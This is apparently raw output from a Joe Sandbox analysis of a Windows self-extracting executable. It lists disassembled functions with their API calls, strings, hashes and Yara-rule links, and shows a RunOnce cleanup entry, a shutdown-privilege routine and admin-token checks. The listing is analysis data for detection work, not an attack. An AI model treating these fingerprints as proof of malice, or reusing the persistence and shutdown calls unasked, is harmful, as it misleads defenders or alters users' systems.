                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                                            • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                                            • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                                            • Opcode ID: 2906ee0769930eaf8322bd78c78951442fadc11e19f6ddb9b3ba213dc5db9d60
                                                                                                                                                                                                                                                            • Instruction ID: 58accc370bbe4b70010f4418d8508ac219bbeb8565e1d9f2ec7836c49d95fd53
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2906ee0769930eaf8322bd78c78951442fadc11e19f6ddb9b3ba213dc5db9d60
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69D17071A08EF49FDF378B3B8C493FA37699B65348F1503A9D486DA5D1D6708E828B40
                                                                                                                                                                                                                                                            Function 003E1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 003E1EFB
                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 003E1F02
                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 003E1FD3
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                            • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                                            • Opcode ID: 6fb9632cab64d27318d17d7bf63852de1f743f6a5e013edc41b004f747f500da
                                                                                                                                                                                                                                                            • Instruction ID: bee4d053e28c39f43ee1336e5b894f0c30ea9af819bf811d3110f82aec0feae2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fb9632cab64d27318d17d7bf63852de1f743f6a5e013edc41b004f747f500da
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0721D671B40295AADB325BA39C4AFBF77BCEB85B11F110319FA02DA1C1D7749C0296A1
                                                                                                                                                                                                                                                            Function 003E6CF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,003E6E26,003E1000), ref: 003E6CF7
                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(&n>,?,003E6E26,003E1000), ref: 003E6D00
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,003E6E26,003E1000), ref: 003E6D0B
                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,003E6E26,003E1000), ref: 003E6D12
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                            • String ID: &n>
                                                                                                                                                                                                                                                            • API String ID: 3231755760-4187928770
                                                                                                                                                                                                                                                            • Opcode ID: 5bbf848b3d8e7a7aaf280cc9b2aa4188385ce994fb7b41314d922ae85ef32888
                                                                                                                                                                                                                                                            • Instruction ID: 983f66e79ce0059eec1466fb001d39bc02d57f2e5ac55bfdb944be9ce7285f12
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bbf848b3d8e7a7aaf280cc9b2aa4188385ce994fb7b41314d922ae85ef32888
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FD01232004988BBDB222BF1EC4CA593F2CFB49313F454104F31E8A0A0CB326451CB53
                                                                                                                                                                                                                                                            Function 003E3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadStringA.USER32(000003E8,003E8598,00000200), ref: 003E3271
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 003E33E2
                                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,valid), ref: 003E33F7
                                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 003E3410
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000836), ref: 003E3426
                                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000), ref: 003E342D
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 003E343F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$valid
                                                                                                                                                                                                                                                            • API String ID: 2418873061-1583058548
                                                                                                                                                                                                                                                            • Opcode ID: de221c1494acbd162bc1d352f95caf83bb02a5d8d890a6e89043c5a793307747
                                                                                                                                                                                                                                                            • Instruction ID: 1cca8ba28be00bdd3a7c9801e941c5f15628f40b6f23b30491bc338b011fb9c8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de221c1494acbd162bc1d352f95caf83bb02a5d8d890a6e89043c5a793307747
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 015126303402F0BAEB335B375C8CFBF2A5D9B46B54F514728F245AB5C1CAA49E019762
                                                                                                                                                                                                                                                            Function 003E34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000), ref: 003E3535
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 003E3541
                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32 ref: 003E355F
                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(003E1140,00000000,00000020,00000004), ref: 003E3590
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 003E35C7
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 003E35F1
                                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 003E35F8
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 003E3610
                                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 003E3617
                                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,valid), ref: 003E3623
                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,003E8798), ref: 003E3637
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 003E3671
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                                            • String ID: valid
                                                                                                                                                                                                                                                            • API String ID: 2406144884-2349282815
                                                                                                                                                                                                                                                            • Opcode ID: bc94d27e7251f74b1819c8b9d210ac329617bb3e52e188769c9b976ca19e12ac
                                                                                                                                                                                                                                                            • Instruction ID: ba89ae99a944bb1e7f2896e5b8eb2baa725d8ee550040bc414cf0975df1fbbe2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc94d27e7251f74b1819c8b9d210ac329617bb3e52e188769c9b976ca19e12ac
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 763191316402E0BBD7331F36ACCDE6A3A6DE786B01F114B29F6069E2E0CA719900DB51
                                                                                                                                                                                                                                                            Function 003E4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 003E4236
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 003E424C
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 003E4263
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 003E427A
                                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,003E88C0,?,00000001), ref: 003E429F
                                                                                                                                                                                                                                                            • CharPrevA.USER32(003E88C0,007D1181,?,00000001), ref: 003E42C2
                                                                                                                                                                                                                                                            • CharPrevA.USER32(003E88C0,00000000,?,00000001), ref: 003E42D6
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003E4391
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003E43A5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                                            • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                                            • Opcode ID: aea9ef40a3d722691ac61e42dc8cec772ed6cb6bfc305835a5e5b854ecc2fc65
                                                                                                                                                                                                                                                            • Instruction ID: 007546da3fa17b389a7d931d7da2b4b453afb0f3aa7f46a17e199cde0425e3c8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aea9ef40a3d722691ac61e42dc8cec772ed6cb6bfc305835a5e5b854ecc2fc65
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8341E778E002E4AFD7239F66DC84AAE7BB8EB49344F050759E9456B2D1CB758C01C762
                                                                                                                                                                                                                                                            Function 003E44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,?,valid,00010010), ref: 003E4554
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 003E45A3
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 003E45E3
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 003E460D
                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 003E4630
                                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,00000000,valid,00000000), ref: 003E4666
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003E466F
                                                                                                                                                                                                                                                              • Part of subcall function 003E681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 003E686E
                                                                                                                                                                                                                                                              • Part of subcall function 003E681F: GetSystemMetrics.USER32(0000004A), ref: 003E68A7
                                                                                                                                                                                                                                                              • Part of subcall function 003E681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003E68CC
                                                                                                                                                                                                                                                              • Part of subcall function 003E681F: RegQueryValueExA.ADVAPI32(?,003E1140,00000000,?,?,0000000C), ref: 003E68F4
                                                                                                                                                                                                                                                              • Part of subcall function 003E681F: RegCloseKey.ADVAPI32(?), ref: 003E6902
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                                            • String ID: LoadString() Error. Could not load string resource.$valid
                                                                                                                                                                                                                                                            • API String ID: 3244514340-303183264
                                                                                                                                                                                                                                                            • Opcode ID: 844b3ced1195852392029cd994fad762035e0c8281333e5c05513c960c3345f9
                                                                                                                                                                                                                                                            • Instruction ID: b9fefe75a985bde65f4cb6ec095c02f900fc4c9cda46442f03540f64be2dde18
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 844b3ced1195852392029cd994fad762035e0c8281333e5c05513c960c3345f9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D51E8719001A99BDF239F29CC48BAA7B69EF4A340F154795FD09AB2C1DB31DD05CB50
                                                                                                                                                                                                                                                            Function 003E2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CharUpperA.USER32(3B97056F,00000000,00000000,00000000), ref: 003E27A8
                                                                                                                                                                                                                                                            • CharNextA.USER32(0000054D), ref: 003E27B5
                                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 003E27BC
                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2829
                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,003E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2852
                                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2870
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E28A0
                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 003E28AA
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(-00000005,00000104), ref: 003E28B9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 003E27E4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                                            • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                                            • Opcode ID: a6d1c2a688df843c75e64867cf0593c669ec26431c5b8fba0a066e6823f23fd9
                                                                                                                                                                                                                                                            • Instruction ID: c0b4d1fe715807daf67f85a1980b5561480273fd32f4208f7138fd47d211b853
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6d1c2a688df843c75e64867cf0593c669ec26431c5b8fba0a066e6823f23fd9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2741D871A001BCAFDB269B569C85AFF77BCEF15700F0041A9F549D6180CB705E858FA1
                                                                                                                                                                                                                                                            Function 003E2267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 003E22A3
                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 003E22D8
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 003E22F5
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 003E2305
                                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 003E236E
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 003E237A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 003E2321
                                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 003E2299
                                                                                                                                                                                                                                                            • wextract_cleanup2, xrefs: 003E227C, 003E22CD, 003E2363
                                                                                                                                                                                                                                                            • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 003E232D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                                                                            • API String ID: 3027380567-1720115735
                                                                                                                                                                                                                                                            • Opcode ID: 3a4bad1751a664c49e2546ae1778977c56b7105f6d8dc2548f0686e4f59d8643
                                                                                                                                                                                                                                                            • Instruction ID: 2cc18f41027bad7e27c2f430c304ce2aafcb59d837a9224b36daa1c97a7a8612
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a4bad1751a664c49e2546ae1778977c56b7105f6d8dc2548f0686e4f59d8643
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2031B871A002686BDB339B52DC85FDB777CEB15740F0402A5F50D9A0D1DA716F48CE50
                                                                                                                                                                                                                                                            Function 003E3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 003E313B
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 003E314B
                                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000834), ref: 003E316A
                                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,valid), ref: 003E3176
                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 003E317D
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000834), ref: 003E3185
                                                                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000FC), ref: 003E3190
                                                                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,003E30C0), ref: 003E31A3
                                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 003E31CA
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                                            • String ID: valid
                                                                                                                                                                                                                                                            • API String ID: 3785188418-2349282815
                                                                                                                                                                                                                                                            • Opcode ID: a542c95f7ffba4ab98a03c34b9db796308fff47ee6672f66548e764220037bdd
                                                                                                                                                                                                                                                            • Instruction ID: 9467df76505e9ce7983c0b56263479ccef055476f3b76c7d80c1c4181a29ead5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a542c95f7ffba4ab98a03c34b9db796308fff47ee6672f66548e764220037bdd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6711B4316046E1FBDB336F259C4CBAA3A6CEB4A721F110718F925AA1E0DB70A641D742
                                                                                                                                                                                                                                                            Function 003E18A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 003E17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003E18DD), ref: 003E181A
                                                                                                                                                                                                                                                              • Part of subcall function 003E17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 003E182C
                                                                                                                                                                                                                                                              • Part of subcall function 003E17EE: AllocateAndInitializeSid.ADVAPI32(003E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003E18DD), ref: 003E1855
                                                                                                                                                                                                                                                              • Part of subcall function 003E17EE: FreeSid.ADVAPI32(?,?,?,?,003E18DD), ref: 003E1883
                                                                                                                                                                                                                                                              • Part of subcall function 003E17EE: FreeLibrary.KERNEL32(00000000,?,?,?,003E18DD), ref: 003E188A
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 003E18EB
                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 003E18F2
                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 003E190A
